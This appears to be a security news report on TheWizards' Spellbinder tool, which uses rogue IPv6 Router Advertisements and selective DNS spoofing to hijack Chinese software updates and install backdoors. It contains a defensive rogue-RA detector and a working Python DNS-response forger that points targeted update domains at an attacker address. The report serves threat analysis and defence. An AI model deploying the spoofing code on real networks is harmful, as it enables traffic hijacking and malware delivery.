Chinese Hackers Use Spellbinder Lateral Movement Tool to Abuse IPv6 SLAAC for AitM Attacks
A China-aligned hacking group known as TheWizards uses a tool called Spellbinder to place itself between victims and the Internet on networks it has already breached, hijacking software updates to deliver malware.

TheWizards deploy Spellbinder as a lateral-movement tool for adversary-in-the-middle (AitM) attacks. Spellbinder sends spoofed IPv6 Router Advertisement messages on the local network; hosts that accept them through stateless address autoconfiguration (SLAAC) treat the attacker's machine as their IPv6 router and send their traffic through it. With that traffic in hand, the attackers redirect the update checks of Chinese software to a server they control and answer them with malicious updates.
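To make the SLAAC abuse concrete, here is an added example (not ESET's analysis code and not TheWizards' tool) that parses an IPv6 Router Advertisement (RFC 4861) and flags it when the advertising router, its MAC address, or the DNS resolvers it pushes through the RDNSS option (RFC 8106) are not on an operator allow-list. The allow-list entries, the sample packets and the packet builder are all constructed for the demo; the real tool's packet contents are not reproduced here.

```python
"""Rogue IPv6 Router Advertisement detector (added example, hypothetical code).

A Spellbinder-style attack works because Windows hosts with IPv6 enabled accept
unsolicited RAs and reconfigure themselves via SLAAC. A network sensor that sees
an RA from an unknown link-local source, with an unknown MAC or pushing an
unexpected resolver, has caught exactly that. Allow-lists below are assumptions.
"""
import ipaddress
import struct

ICMPV6 = 58
ROUTER_ADVERTISEMENT = 134
OPT_SRC_LLADDR, OPT_PREFIX_INFO, OPT_RDNSS = 1, 3, 25

# Constructed operator allow-lists: the real router's link-local address, its MAC,
# and the resolvers SLAAC clients are expected to learn.
KNOWN_ROUTERS = {ipaddress.IPv6Address("fe80::1")}
KNOWN_ROUTER_MACS = {"00:11:22:33:44:55"}
KNOWN_DNS = {ipaddress.IPv6Address("2001:db8::53")}


def parse_ra(frame):
    """Return a dict describing the RA in an IPv6 packet, or None if it is not an RA."""
    if len(frame) < 56:
        return None
    nxt, hop_limit = frame[6], frame[7]          # IPv6 next header / hop limit
    src = ipaddress.IPv6Address(frame[8:24])
    dst = ipaddress.IPv6Address(frame[24:40])
    if nxt != ICMPV6 or frame[40] != ROUTER_ADVERTISEMENT:
        return None
    router_lifetime = struct.unpack("!H", frame[46:48])[0]
    ra = {"src": src, "dst": dst, "hop_limit": hop_limit,
          "router_lifetime": router_lifetime, "lladdr": None, "prefixes": [], "rdnss": []}
    off = 56                                     # first option after the 16-byte RA body
    while off + 2 <= len(frame):
        otype, olen = frame[off], frame[off + 1] * 8   # option length is in 8-byte units
        if olen == 0 or off + olen > len(frame):
            break                                # malformed option: stop, do not loop forever
        body = frame[off + 2:off + olen]
        if otype == OPT_SRC_LLADDR and len(body) >= 6:
            ra["lladdr"] = ":".join(f"{b:02x}" for b in body[:6])
        elif otype == OPT_PREFIX_INFO and olen == 32:
            ra["prefixes"].append(f"{ipaddress.IPv6Address(body[14:30])}/{body[0]}")
        elif otype == OPT_RDNSS:
            for i in range(6, len(body) - 15, 16):   # addresses follow reserved + lifetime
                ra["rdnss"].append(ipaddress.IPv6Address(body[i:i + 16]))
        off += olen
    return ra


def rogue_ra_reasons(ra):
    """List the reasons an RA looks rogue; an empty list means it matches the allow-lists."""
    reasons = []
    if ra["hop_limit"] != 255:
        reasons.append("hop limit is not 255 (RFC 4861 requires an on-link origin)")
    if not ra["src"].is_link_local:
        reasons.append("source is not a link-local address")
    if ra["src"] not in KNOWN_ROUTERS:
        reasons.append(f"unknown advertising router {ra['src']}")
    if ra["lladdr"] and ra["lladdr"] not in KNOWN_ROUTER_MACS:
        reasons.append(f"unknown router MAC {ra['lladdr']}")
    for dns in ra["rdnss"]:
        if dns not in KNOWN_DNS:
            reasons.append(f"RDNSS pushes unexpected resolver {dns}")
    return reasons


def build_ra(src, mac, prefix, dns, hop_limit=255):
    """Construct a minimal RA (IPv6 + ICMPv6, checksum left zero) for the demo."""
    mac_bytes = bytes(int(x, 16) for x in mac.split(":"))
    opts = bytes([OPT_SRC_LLADDR, 1]) + mac_bytes
    opts += (bytes([OPT_PREFIX_INFO, 4, 64, 0xC0]) + struct.pack("!III", 2592000, 604800, 0)
             + ipaddress.IPv6Address(prefix).packed)
    opts += bytes([OPT_RDNSS, 3]) + struct.pack("!HI", 0, 1800) + ipaddress.IPv6Address(dns).packed
    icmp = bytes([ROUTER_ADVERTISEMENT, 0, 0, 0, 64, 0]) + struct.pack("!HII", 1800, 0, 0) + opts
    hdr = (struct.pack("!IHBB", 0x60000000, len(icmp), ICMPV6, hop_limit)
           + ipaddress.IPv6Address(src).packed + ipaddress.IPv6Address("ff02::1").packed)
    return hdr + icmp


# Constructed samples: the legitimate router versus an attacker host on the same LAN.
LEGIT_RA = build_ra("fe80::1", "00:11:22:33:44:55", "2001:db8:1::", "2001:db8::53")
ROGUE_RA = build_ra("fe80::dead:beef", "de:ad:be:ef:00:01", "2001:db8:bad::", "2001:db8:bad::1")

if __name__ == "__main__":
    for label, pkt in (("legit", LEGIT_RA), ("rogue", ROGUE_RA)):
        print(label, rogue_ra_reasons(parse_ra(pkt)) or "ok")
```

On a real network the same check belongs in the switch (RA Guard) or in a sensor fed by a packet capture; disabling router discovery on hosts that do not need IPv6 removes the attack surface entirely.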
The attackers hijack the update mechanism of popular Chinese programs such as Sogou Pinyin to install a backdoor called WizardNet. TheWizards mainly target individuals and gambling companies in Cambodia, Hong Kong, Mainland China, the Philippines, and the United Arab Emirates.
Spellbinder has been in use since at least 2022. After gaining access to a network, the attackers drop several files to launch the tool. One of them, winpcap.exe, is a WinPcap installer; it supplies the packet-capture driver Spellbinder relies on to sniff and answer network traffic.
In 2024, the group used Spellbinder to hijack the update mechanism of Tencent QQ. Spellbinder did not change any DNS settings on the victims; it intercepted the client's DNS query for the update server and answered it with the address of a malicious server, which then delivered WizardNet to the target computers.
Spellbinder is selective. It watches the DNS queries passing through the attacker's machine and checks whether the queried name is on a hard-coded list of domains belonging to Chinese platforms such as Tencent, Baidu, and Xiaomi. Matching queries receive a spoofed response pointing to the attacker's server; other traffic is forwarded normally, which keeps the victim's connectivity working and the attack inconspicuous.
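The DNS-hijack step described in the last two paragraphs, as an added example (hypothetical code, not Spellbinder itself): it parses a DNS query taken off intercepted traffic, matches the name against a hard-coded domain list, and on a hit builds a forged A-record answer pointing at an attacker address; a second helper extracts the answer IPs so a defender can check what a resolver actually returned. The domain list, the 192.0.2.10 address and the sample queries are constructed for illustration.

```python
"""Spellbinder-style selective DNS spoofing (added example, hypothetical code).

Only A queries for names under the target domains are answered with the
attacker's address; every other query returns None, meaning "forward unchanged",
which is what keeps the victim's normal connectivity intact.
"""
import struct

# Constructed target list; the real tool's list is not reproduced here.
TARGET_DOMAINS = ("qq.com", "baidu.com", "xiaomi.com")
ATTACKER_IP = "192.0.2.10"   # documentation address, an assumption for the demo


def parse_qname(data, offset):
    """Decode a label sequence starting at offset; return (name, offset after it)."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0:                       # compression pointers never appear in a question
            raise ValueError("compressed name in question")
        offset += 1
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def parse_query(packet):
    if len(packet) < 12:
        raise ValueError("short DNS packet")
    txid, flags, qdcount, _, _, _ = struct.unpack("!6H", packet[:12])
    if flags & 0x8000:
        raise ValueError("not a query")
    if qdcount != 1:
        raise ValueError("unsupported qdcount")
    qname, off = parse_qname(packet, 12)
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return {"id": txid, "qname": qname, "qtype": qtype, "qclass": qclass,
            "question": packet[12:off + 4]}     # copied verbatim into the forged reply


def is_target(qname):
    """Suffix match on whole labels, so 'notqq.com' does not match 'qq.com'."""
    name = qname.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in TARGET_DOMAINS)


def build_spoofed_response(packet, attacker_ip=ATTACKER_IP, ttl=60):
    """Return a forged A-record response for a target query, or None to let it pass."""
    q = parse_query(packet)
    if not is_target(q["qname"]) or q["qtype"] != 1 or q["qclass"] != 1:
        return None
    header = struct.pack("!6H", q["id"], 0x8180, 1, 1, 0, 0)      # QR, RD, RA; one answer
    rdata = bytes(int(o) for o in attacker_ip.split("."))
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + rdata  # name pointer to offset 12
    return header + q["question"] + answer


def build_query(txid, qname, qtype=1):
    """Construct a standard recursive query for the demo."""
    name = b"".join(bytes([len(l)]) + l.encode("ascii")
                    for l in qname.rstrip(".").split(".")) + b"\x00"
    return struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0) + name + struct.pack("!HH", qtype, 1)


def answer_ips(response):
    """Defender-side helper: list the IPv4 addresses in a response's answer section."""
    _, _, qd, an, _, _ = struct.unpack("!6H", response[:12])
    off = 12
    for _ in range(qd):
        _, off = parse_qname(response, off)
        off += 4
    ips = []
    for _ in range(an):
        if (response[off] & 0xC0) == 0xC0:     # compressed owner name
            off += 2
        else:
            _, off = parse_qname(response, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", response[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(".".join(str(b) for b in response[off:off + 4]))
        off += rdlen
    return ips


if __name__ == "__main__":
    for name in ("update.qq.com", "example.org"):
        forged = build_spoofed_response(build_query(0x1234, name))
        print(name, "->", answer_ips(forged) if forged else "forwarded untouched")
```

The check a defender can run is the inverse of the attacker's matching logic: resolve the update hosts from the machine and from a trusted network, and compare the answer sets; an update domain that resolves to an address outside the vendor's known ranges on the LAN only is the signature of this hijack.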
TheWizards also use another tool, DarkNights, also known as DarkNimbus, made by the Chinese company Sichuan Dianke Network Security Technology Co., Ltd. (UPSEC). Windows victims receive WizardNet, while the attackers configure the malicious update server to deliver DarkNights to Android devices.
UPSEC appears to act as a supplier of offensive tooling to TheWizards, providing the group with software for its operations.